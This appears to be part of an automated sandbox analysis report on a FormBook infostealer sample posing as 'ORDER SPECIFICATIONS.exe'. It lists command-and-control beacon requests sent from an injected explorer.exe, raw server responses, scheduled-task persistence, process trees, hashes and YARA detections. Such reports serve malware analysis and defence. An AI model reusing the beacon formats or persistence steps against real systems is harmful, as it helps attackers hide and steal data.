2	192.168.2.5	49731	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:57:55.635871887 CET	5450	OUT	GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1 Host: www.denisekohli.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:57:55.775059938 CET	5450	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 07:57:55 GMT Content-Type: text/html Content-Length: 275 ETag: "603155b8-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49732	156.240.32.114	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:58:01.264838934 CET	5451	OUT	GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1 Host: www.hostsnc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:58:01.486218929 CET	5451	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 07:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49734	13.57.130.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:58:06.798021078 CET	5488	OUT	GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1 Host: www.assemble-4u.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:58:07.001431942 CET	5489	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 07:58:06 GMT Server: Apache Location: https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src Content-Length: 331 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 73 73 65 6d 62 6c 65 2d 34 75 2e 63 6f 6d 2f 6f 77 77 73 2f 3f 46 5a 41 3d 74 48 62 4d 44 44 65 61 64 6d 56 4e 67 4b 59 63 72 65 75 6e 63 52 77 66 37 62 6f 55 43 4b 6c 36 4d 4e 7a 72 57 4d 4d 35 4a 72 64 62 34 49 70 41 70 38 2b 43 47 62 57 59 41 56 6b 44 33 6e 39 6f 5a 51 61 67 26 61 6d 70 3b 47 7a 72 58 3d 42 78 6f 30 73 72 63 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49735	54.85.86.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:58:12.204418898 CET	5490	OUT	GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1 Host: www.raphaelyejesiel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:58:12.338124037 CET	5491	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 07:58:12 GMT Server: Apache Set-Cookie: session=gshim4iannpbkjt0e93p1h8qjd; path=/; domain=.raphaelyejesiel.com; secure; SameSite=None Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 37 33 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 Data Ascii: 73c3<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada \| Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnaly
Feb 23, 2021 08:58:12.338160992 CET	5493	IN	Data Raw: 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e Data Ascii: ticsObject']=r;i[r]=i[r]\|\|function(){ (i[r].q=i[r].q\|\|[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.googl
Feb 23, 2021 08:58:12.338188887 CET	5494	IN	Data Raw: 63 68 61 73 65 27 2c 20 27 4c 65 61 64 27 2c 20 27 43 6f 6d 70 6c 65 74 65 52 65 67 69 73 74 72 61 74 69 6f 6e 27 5d 3b 0a 20 20 20 20 76 61 72 20 74 72 61 63 6b 54 79 70 65 20 3d 20 28 73 74 64 54 72 61 63 6b 73 2e 69 6e 64 65 78 4f 66 28 65 76 Data Ascii: chase', 'Lead', 'CompleteRegistration']; var trackType = (stdTracks.indexOf(evtName) > -1) ? 'track' : 'trackCustom'; if (evtParams) { fbq(trackType, evtName, evtParams); } else { fbq(trackType, evtName); } }
Feb 23, 2021 08:58:12.338217020 CET	5495	IN	Data Raw: 39 79 4e 76 31 73 63 6e 33 74 73 33 4e 59 6f 6e 4a 57 34 4c 38 37 50 4c 36 36 5a 2f 32 38 4e 58 37 35 6f 72 2f 34 46 72 38 35 58 2f 32 39 4f 6e 33 38 2b 50 64 66 61 44 2f 38 4b 76 35 75 74 44 39 38 66 58 7a 78 74 62 30 71 73 58 33 38 74 6a 2f 36 Data Ascii: 9yNv1scn3ts3NYonJW4L87PL66Z/28NX75or/4Fr85X/29On38+PdfaD/8Kv5utD98fXzxtb0qsX38tj/6Yn+/f7/7Z/46/D566z378/18+j++Pv/5nTs0tv655D47LP78cH5wdTkjazXfp7/4l7/4mP1qMP88LvHVoDMXof1v9LYcpfSaY/38+XurcT28+jtor3yzqjdnbXpusvz3eX37sXZf3f75of/7qP50uDrnbnrrGPz2e
Feb 23, 2021 08:58:12.338243961 CET	5497	IN	Data Raw: 20 20 20 0a 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 70 72 69 6e 63 69 70 61 6c 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 75 6c Data Ascii: <div class="navbar-default" id="mobile-menu-principal"> <a class="pull-left logo" href="//www.casar.com"> <img src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site
Feb 23, 2021 08:58:12.338269949 CET	5498	IN	Data Raw: 78 2d 77 69 64 74 68 3a 20 31 33 34 70 78 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 65 63 6f 6e 64 5f 6c Data Ascii: x-width: 134px" /> <img class="second_logo" src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site de casamen
Feb 23, 2021 08:58:12.338298082 CET	5499	IN	Data Raw: 61 73 73 3d 22 61 74 69 76 6f 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 61 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 64 65 73 74 61 71 75 65 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 Data Ascii: ass="ativo"><a href="https://www.casar.com" class="destaque">Home</a></li> <li><a href="https://www.casar.com/assunto/casamentos/casamentos-reais/">Casamentos Reais</a></li> <li><a href="
Feb 23, 2021 08:58:12.338330984 CET	5501	IN	Data Raw: 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 20 20 64 72 6f 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <li class=" dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'eventos'); return true;">
Feb 23, 2021 08:58:12.338361025 CET	5502	IN	Data Raw: 2d 74 6f 67 67 6c 65 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 68 6f 6d 65 Data Ascii: -toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'facasitegratis'); return true;"> Site de Casamento <b class="caret"></b> </a>
Feb 23, 2021 08:58:12.338387966 CET	5504	IN	Data Raw: 76 6f 73 2e 63 61 73 61 72 2e 63 6f 6d 2f 62 75 73 63 61 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 73 69 74 65 2d 64 6f 73 2d 6e 6f 69 76 6f 73 2d 6d 65 6e 75 27 2c 20 27 62 75 73 63 61 64 6f 72 2d 6c 69 73 74 61 27 2c 20 Data Ascii: vos.casar.com/busca" onclick="trackEvt('site-dos-noivos-menu', 'buscador-lista', 'compre-seu-presente'); return true;">Encontre um casamento</a></li> </ul> </li> </ul>
Feb 23, 2021 08:58:12.465953112 CET	5505	IN	Data Raw: 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 3c Data Ascii: tainer"> <h1>Pgina no encontrada</h1> <br><div class="alert alert-danger">Verifique o endereo (URL) e tente novamente</div> </div> </div> <link href="//fonts.googleapis.com/css?family=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49736	34.90.54.238	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:58:17.613405943 CET	5522	OUT	GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1 Host: www.your-new-body-plan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:58:17.661597013 CET	5522	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 23 Feb 2021 07:58:17 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-HTTPS-Enforce: 1 X-Proxy-Cache-Info: DT:1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49737	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:58:22.815170050 CET	5524	OUT	GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1 Host: www.softwaresreports.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:58:22.954349995 CET	5524	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 07:58:22 GMT Content-Type: text/html Content-Length: 275 ETag: "603155b8-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ORDER SPECIFICATIONS.exe PID: 6336 Parent PID: 5596

General

Start time:	08:56:47
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
Imagebase:	0x6a0000
File size:	552448 bytes
MD5 hash:	E75A4DF51162401B21C3EB79718FB3DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6476 Parent PID: 6336

General

Start time:	08:56:56
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
Imagebase:	0x1130000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6484 Parent PID: 6476

General

Start time:	08:56:56
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ORDER SPECIFICATIONS.exe PID: 6520 Parent PID: 6336

General

Start time:	08:56:57
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Imagebase:	0x160000
File size:	552448 bytes
MD5 hash:	E75A4DF51162401B21C3EB79718FB3DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ORDER SPECIFICATIONS.exe PID: 6552 Parent PID: 6336

General

Start time:	08:56:57
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Imagebase:	0xac0000
File size:	552448 bytes
MD5 hash:	E75A4DF51162401B21C3EB79718FB3DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6552

General

Start time:	08:57:00
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chkdsk.exe PID: 6364 Parent PID: 3472

General

Start time:	08:57:15
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x11d0000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
